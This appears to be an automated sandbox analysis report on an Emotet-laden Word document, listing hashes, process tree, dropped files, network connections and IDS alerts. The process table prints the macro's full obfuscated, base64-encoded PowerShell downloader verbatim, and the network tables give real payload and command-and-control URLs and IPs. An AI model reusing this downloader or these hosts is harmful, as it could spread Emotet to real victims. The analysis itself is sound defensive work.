download: | CbHqD-uSqdE2FwzZyWUD_txfHBHned-Fq |
Full analysis: | https://app.any.run/tasks/8d355fe5-2696-40ee-b65a-04fdbbc4a83d |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 15, 2019, 14:43:04 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Apr 15 15:26:00 2019, Last Saved Time/Date: Mon Apr 15 15:26:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
MD5: | 068AC613ECF5D1E77FE4DD9B89290BE1 |
SHA1: | 944BDBE42C33E01B4A052BD6A8102E18E2648DB9 |
SHA256: | 2DDBF0F88A1C64BECC86F8290A7C3EE13CF206A6A176CF0548FCBC311C9ABED1 |
SSDEEP: | 6144:b77HUUUUUUUUUUUUUUUUUUUT52Vk5jjZx1k2sXp2PAKDwIaMYVRd:b77HUUUUUUUUUUUUUUUUUUUTCkRr1joF |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 3 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 3 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:04:15 14:26:00 |
CreateDate: | 2019:04:15 14:26:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3796 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\CbHqD-uSqdE2FwzZyWUD_txfHBHned-Fq.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1424 | PoWeRsHelL -e JABYAEQAQQBVAEEAUQBDADQAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAEwAawB4ACcALAAnAF8AQwAnACkALAAnAEEAbwBVACcAKQA7ACQASgBCAEEAMQBDAFEAIAA9ACAAJwAzADUAOAAnADsAJABIAEEANABBAEMAQQBRAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBYADQAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBUAHcAJwAsACcAVQBBACcAKQAsACcAQgAnACkAKQA7ACQAVQBBAEEAQgBHAEEAQQAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABKAEIAQQAxAEMAUQArACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB4AGUAJwAsACcALgBlACcAKQA7ACQATwBBAEQAQgBRAEEAYwBBAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACcAegBVAEEAJwAsACcAMQBBACcALAAnAEEAQQBaACcAKQA7ACQAWQBaAFUAMQB4AFUAPQAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAG4ARQBUAC4AYAB3AEUAYABCAEMATABpAGUATgBUADsAJABaAEQAbwBBAGsAdwA9ACgAIgB7ADEAOAB9AHsAMgB9AHsAMQA5AH0AewA2AH0AewAyADEAfQB7ADkAfQB7ADIAMwB9AHsAMwA2AH0AewAxADYAfQB7ADEAfQB7ADIAMgB9AHsAMgA5AH0AewAzADEAfQB7ADIANAB9AHsAMQAxAH0AewA3AH0AewAxADUAfQB7ADIANQB9AHsAMwAzAH0AewA1AH0AewAyADYAfQB7ADEANwB9AHsAMgA4AH0AewAyADAAfQB7ADAAfQB7ADEAMAB9AHsAMQAyAH0AewAzADcAfQB7ADMAMAB9AHsANAB9AHsAMwA0AH0AewA4AH0AewAyADcAfQB7ADMAMgB9AHsAMQA0AH0AewAzAH0AewAzADUAfQB7ADEAMwB9ACIAIAAtAGYAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALgAnACwAJwBlAC0AZABvACcAKQAsACcAZwBzAGgAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBlAHcAJwAsACcALwAvAG4AJwApACkALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAGkAbAAnACwAJwB2ACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAcAA6AC8AJwAsACcALwAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHQAdABwACcALAAnADoALwAvACcAKQAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiAC0AZgAgACcAYQAnACwAJwByACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAC4AYwAnACwAJwBkAGkAbgBnACcAKQAsACcAbwBtACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBzACcALAAnAHUAZABlACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAnAHcAJwAsACcALgAnACwAJwBtAGUAcgBjACcAKQAsACcAYQB2AGkAJwApACwAJwB1ACcALAAnAHcAcAAtACcALAAnAC8AQAAnACwAJwBvACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAG8AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGUAdQAnACwAJwBwAC4AJwApACkALAAnAG0ALwAnACwAJwAvACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAF8AZQAnACwAJwBCAC8AJwApACwAJwB0ACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAG4AdABlACcALAAnAG8AJwApACwAJwBjACcAKQAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdAAnACwAJwB5AC8AQABoACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwAvAHMAbAAnACwAJwBfAGcAJwApACwAJwB0ACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGMAbwBtACcALAAnAC8AeABsACcAKQAsACcAaAAnACwAJwBiACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAdABwAHMAOgAnACwAJwBoAHQAJwApACwAJwAvAEAAJwAsACcAXwA5ACcAKQAsACcAcwB5AGMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAcwByACcALAAnAG8AbwAnACkALAAnAGwAYQAnACkALAAnAHcAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAHIAJwAsACcAYwBvACcALAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAGYAJwBhAGMAJwAsACcAdABvACcALAAnAHIAcwAuACcAKQApACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwAvAEAAJwAsACcAbgAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwB0AC8ARgBfAE8AJwAsACcANwAnACkAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACcAZAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAGcAcgBvAHUAcAAuACcALAAnAG8AJwApACwAJwBlACcAKQAsACcAaAB0ACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAdgBzADAAJwAsACcALwAnACkALAAnAEkAJwAsACcAcAAnACkALAAnAGYAaQAnACwAJwBsACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAJwBnACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBjAG8AJwAsACcAbgB0ACcAKQAsACcAbgAnACkALAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAdAAnACwAJwBwADoALwAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAGQAbgBpACcALAAnAC8AbQAnACwAJwBhACcAKQApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAC8ALwB3AHcAJwAsACcAdABwADoAJwApACwAJwB0ACcALAAnAGgAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvAFYAJwAsACcAXwA2ACcAKQAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAvAHcAcAAnACwAJwAtACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBjAGwAJwAsACcAaQBuACcAKQAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACcAZABlACcALAAnAHMALwB2ACcALAAnAHUAJwApACkALAAoACIAewA0AH0AewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAHcAcAAtACcALAAnAGEALwAnACwAJwAuAGMAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAHMAJwAsACcAZABlACcALAAnAGkAbgBjAGwAdQAnACkALAAnAHMAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAbgBjACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAC0AaQAnACwAJwB3AHAAJwApACkAKQAuACIAcwBQAGAAbABpAFQAIgAoACcAQAAnACkAOwAkAFgAVQBYAEQAawBVAGMAQQA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAEQAQQAnACwAJwBtACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBBACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAFgAJwAsACcAUQBEAEQAJwApACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAQQB4ADQAWAB4ACAAaQBuACAAJABaAEQAbwBBAGsAdwApAHsAdAByAHkAewAkAFkAWgBVADEAeABVAC4AIgBEAGAATwBXAE4ATABvAGAAQQBgAGQAZgBpAGwARQAiACgAJABpAEEAeAA0AFgAeAAsACAAJABVAEEAQQBCAEcAQQBBADEAKQA7ACQAcABBAEEAQgBRAEMARAA9ACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACcAbwAnACwAJwBBAFEAQQAnACwAJwBuAEEAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFUAQQBBAEIARwBBAEEAMQApAC4AIgBsAGAAZQBuAGcAdABIACIAIAAtAGcAZQAgADMAMQAxADUANgApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABVAEEAQQBCAEcAQQBBADEAOwAkAGwAQQBEAEIARABBAFgAQwA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAQQB4AGsAJwAsACcAYwAnACwAJwBSADEAQQAnACkAOwBiAHIAZQBhAGsAOwAkAFMAQgBBADEAWABEAHgAPQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAJwBEAFoAQQAnACwAJwBEADQARAAnACwAJwBBAEEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAFoARwBCAEEAQQA9ACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAeAAnACwAJwBmAEEAQQAnACkALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcARAAnACwAJwBHAEEAQQAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2488 | "C:\Users\admin\358.exe" | C:\Users\admin\358.exe | — | PoWeRsHelL.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2100 | --ba2b9974 | C:\Users\admin\358.exe | 358.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3768 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 358.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2176 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3108 | "C:\Users\admin\AppData\Local\soundser\KgJzUOfu1pZLF8Zss.exe" | C:\Users\admin\AppData\Local\soundser\KgJzUOfu1pZLF8Zss.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3560 | --f60eeb43 | C:\Users\admin\AppData\Local\soundser\KgJzUOfu1pZLF8Zss.exe | KgJzUOfu1pZLF8Zss.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2168 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | KgJzUOfu1pZLF8Zss.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2716 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
3796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DC4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1424 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BZQ3AU4DG8RFZ8VK8K63.temp | — | |
MD5:— | SHA256:— | |||
3796 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:E0A6D871DF9AF8A843020CC2FC70CA4E | SHA256:33FAFDD37700ECE853AC83901FBEAB68A9A8E725B6B27DF6C65EDBF64767BE47 | |||
3796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:64EACABB85CBA1D6FFE49E86A0D25A8A | SHA256:BA2104545A3D90BFB04475FBAE2FB5A576E3653BBCCB35BA9B6FA59A738E0575 | |||
3560 | KgJzUOfu1pZLF8Zss.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:5E41928109CDB5AF7EF16B98F7D79C01 | SHA256:AA52C8ABE36941610FEAEE2BAE4F827D76877B5830356859B71DACCF8C960BF3 | |||
2100 | 358.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:063652527B287D8C92330CCAC3C703D0 | SHA256:E91160F0AB3D4632F5074BE92BCBA008A0DD1EF7D6F5AD2DD4ADE968106C6172 | |||
3796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$HqD-uSqdE2FwzZyWUD_txfHBHned-Fq.doc | pgc | |
MD5:E4BA634AFEE699373AAD5A232685E3C4 | SHA256:CA353B6DC5F97E64359CEB05175A782DB5EDA403D6025426939AD8DFDBB5A1AE | |||
1424 | PoWeRsHelL.exe | C:\Users\admin\358.exe | executable | |
MD5:063652527B287D8C92330CCAC3C703D0 | SHA256:E91160F0AB3D4632F5074BE92BCBA008A0DD1EF7D6F5AD2DD4ADE968106C6172 | |||
1424 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2176 | soundser.exe | C:\Users\admin\AppData\Local\soundser\KgJzUOfu1pZLF8Zss.exe | executable | |
MD5:5E41928109CDB5AF7EF16B98F7D79C01 | SHA256:AA52C8ABE36941610FEAEE2BAE4F827D76877B5830356859B71DACCF8C960BF3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1424 | PoWeRsHelL.exe | GET | 200 | 192.185.41.243:80 | http://busycows.ca/wp-includes/sl_gy/ | US | executable | 131 Kb | suspicious |
2176 | soundser.exe | POST | — | 165.255.52.192:80 | http://165.255.52.192/json/guids/ | ZA | — | — | malicious |
2716 | soundser.exe | POST | — | 82.0.19.40:80 | http://82.0.19.40/teapot/cookies/ | GB | — | — | malicious |
2176 | soundser.exe | POST | 200 | 216.98.148.156:8080 | http://216.98.148.156:8080/chunk/publish/ringin/merge/ | US | binary | 90.7 Kb | malicious |
2176 | soundser.exe | POST | — | 82.0.19.40:80 | http://82.0.19.40/img/raster/ringin/ | GB | — | — | malicious |
2716 | soundser.exe | POST | — | 165.255.52.192:80 | http://165.255.52.192/jit/pnp/ | ZA | — | — | malicious |
2176 | soundser.exe | POST | — | 201.248.5.197:80 | http://201.248.5.197/chunk/sess/ringin/ | VE | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1424 | PoWeRsHelL.exe | 192.185.41.243:80 | busycows.ca | CyrusOne LLC | US | suspicious |
2176 | soundser.exe | 82.0.19.40:80 | — | Virgin Media Limited | GB | malicious |
2176 | soundser.exe | 165.255.52.192:80 | — | Afrihost | ZA | malicious |
2716 | soundser.exe | 165.255.52.192:80 | — | Afrihost | ZA | malicious |
2716 | soundser.exe | 82.0.19.40:80 | — | Virgin Media Limited | GB | malicious |
2176 | soundser.exe | 201.248.5.197:80 | — | CANTV Servicios, Venezuela | VE | malicious |
2176 | soundser.exe | 216.98.148.156:8080 | — | CariNet, Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
busycows.ca |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1424 | PoWeRsHelL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1424 | PoWeRsHelL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1424 | PoWeRsHelL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1424 | PoWeRsHelL.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
2176 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2176 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2176 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2176 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2716 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2716 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |